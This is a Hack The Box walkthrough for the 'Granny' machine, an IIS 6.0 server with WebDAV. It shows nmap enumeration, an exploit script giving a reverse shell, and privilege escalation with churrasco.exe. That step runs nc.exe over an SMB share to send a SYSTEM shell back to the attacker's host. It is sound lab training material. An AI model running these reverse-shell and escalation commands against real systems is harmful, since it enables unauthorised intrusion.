Granny HTB
IP
10.10.10.15initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.15 | cut -d"/" -f1 | tr '\n' ','Looks like we have one port open on the machine
80
Lets get enumerate further and see if we can find any other details
sudo nmap -sCV -p80 -oA nmap_scan 10.10.10.15results
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Date: Tue, 02 Jan 2024 02:37:59 GMT
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsWe can see
Running Microsoft IIS httpd 6.0 (pretty outdated)
webdav is enabled
This does look very familiar to the grandpa box we have solved recently meaning i can try the same explaoit and gain a shell on the system
Lets start a listner
rlwrap -cAr nc -lvnp 9001lets run the exploit script
python2 exploit.py 10.10.10.15 80 10.10.14.2 9001Looking back at our listener we can see we have a shell on the target
Since we know that the grandpa box was vulnerable to token manipulation good chances we have the same scenario here lets check
whoami /all
Looks like it so Lets upload
nc.exechurrasco.exe
start an smb server and transfer all the files across
sudo python2 /opt/impacket-0.9.19/examples/smbserver.py shrek123 ./ -smb2supportcopy the files across to the target machine
C:\>copy \\10.10.14.2\shrek123\nc.exe C:\wmpub
C:\>copy \\10.10.14.2\shrek123\churrasco.exe C:\wmpubstart a listener
nc -lvnp 9005run the exploits
churrasco.exe -d "c:\wmpub\nc.exe -e cmd 10.10.14.2 9005"Now if we look back at our listner we should see we have a shell as nt authority\system
Last updated